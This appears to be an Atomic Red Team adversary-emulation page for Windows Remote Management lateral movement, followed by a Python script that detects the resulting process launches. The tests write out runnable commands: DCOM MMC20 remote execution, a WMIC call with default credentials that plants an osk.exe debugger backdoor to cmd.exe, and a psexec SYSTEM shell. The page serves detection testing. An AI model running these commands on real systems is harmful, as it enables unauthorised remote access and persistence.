# T1028 - Windows Remote Management

Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)

**Detection:** Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.

**Platforms:** Windows

**Data Sources:** File monitoring, Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring

**Permissions Required:** User, Administrator

**System Requirements:** WinRM listener turned on and configured on remote system

**Remote Support:** Yes

## Atomic Tests


### Atomic Test #1 - Enable Windows Remote Management

Enable WinRM with PowerShell.

**Supported Platforms:** Windows

**Run it with `powershell`!**

```powershell
Enable-PSRemoting -Force
```


### Atomic Test #2 - PowerShell Lateral Movement

PowerShell lateral movement using the MMC20.Application COM object.

Reference:

https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/

**Supported Platforms:** Windows

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computername | Name of Computer | string | computer1 |

**Run it with `command_prompt`!**

```
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","${computername}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```


### Atomic Test #3 - WMIC Process Call Create

Use WMIC to start a remote process.

**Supported Platforms:** Windows

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN\Administrator |
| password | Password | String | P@ssw0rd1 |
| computer_name | Target Computer Name | String | Target |

**Run it with `command_prompt`!**

```
wmic /user:${user_name} /password:${password} /node:${computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
```


### Atomic Test #4 - Psexec

Use psexec to start a remote process.

**Supported Platforms:** Windows

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN\Administrator |
| password | Password | String | P@ssw0rd1 |
| computer_name | Target Computer Name | String | Target |

**Run it with `command_prompt`!**

```
psexec \\${computer_name} -u ${user_name} -p ${password} -s cmd.exe
```
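The detection guidance at the top of this page (monitor processes created by the WinRM host) applies just as well to the DCOM, WMI and PsExec tests above, since each of them starts its command under a characteristic parent process. The script below is an added example, not code from Atomic Red Team: it parses constructed process-creation records (the key=value layout and the field names Computer, Image and ParentImage are assumptions modelled on Sysmon Event ID 1) and flags children of wsmprovhost.exe, mmc.exe, WmiPrvSE.exe and PSEXESVC.exe.

```python
"""Flag process creations spawned by the hosts that service remote execution.
Added example, not part of Atomic Red Team; the key=value event layout and the
field names are assumptions modelled on Sysmon Event ID 1 / Security 4688."""
import re
from typing import Iterable, Optional, Tuple

# Parent process that hosts the remotely started command for each technique on
# this page. mmc.exe is also a normal interactive tool, so its hits need triage.
REMOTE_EXEC_HOSTS = {
    "wsmprovhost.exe": "WinRM",
    "mmc.exe": "DCOM MMC20.Application",
    "wmiprvse.exe": "WMI process call create",
    "psexesvc.exe": "PsExec",
}
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_event(line: str) -> dict:
    """Parse one key=value event line into a dict, stripping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}

def classify(event: dict) -> Optional[Tuple[str, str, str]]:
    """Return (technique, computer, child image) if the parent is a remote-exec host."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    technique = REMOTE_EXEC_HOSTS.get(parent)
    if technique is None:
        return None
    return technique, event.get("Computer", "?"), event.get("Image", "?")

def detect(lines: Iterable[str]) -> list:
    """Run classify() over every line and keep only the hits."""
    return [hit for hit in (classify(parse_event(l)) for l in lines) if hit]

# Constructed sample events: two ordinary launches and one per atomic test.
SAMPLE_LOG = [
    'EventID=1 Computer=ws01 Image="C:\\Windows\\System32\\notepad.exe" ParentImage="C:\\Windows\\explorer.exe"',
    'EventID=1 Computer=ws01 Image="C:\\Windows\\System32\\cmd.exe" ParentImage="C:\\Windows\\System32\\wsmprovhost.exe"',
    'EventID=1 Computer=ws02 Image="C:\\Windows\\System32\\calc.exe" ParentImage="C:\\Windows\\System32\\mmc.exe"',
    'EventID=1 Computer=ws03 Image="C:\\Windows\\System32\\reg.exe" ParentImage="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"',
    'EventID=1 Computer=ws04 Image="C:\\Windows\\System32\\cmd.exe" ParentImage="C:\\Windows\\PSEXESVC.exe"',
    'EventID=1 Computer=ws01 Image="C:\\Windows\\System32\\svchost.exe" ParentImage="C:\\Windows\\System32\\services.exe"',
]

if __name__ == "__main__":
    for technique, computer, image in detect(SAMPLE_LOG):
        print(f"{computer}: {image} started via {technique}")
```

Real deployments would feed the same classify() logic from Sysmon or Security 4688 events rather than the constructed lines, and baseline which hosts legitimately receive WinRM or WMI sessions before alerting.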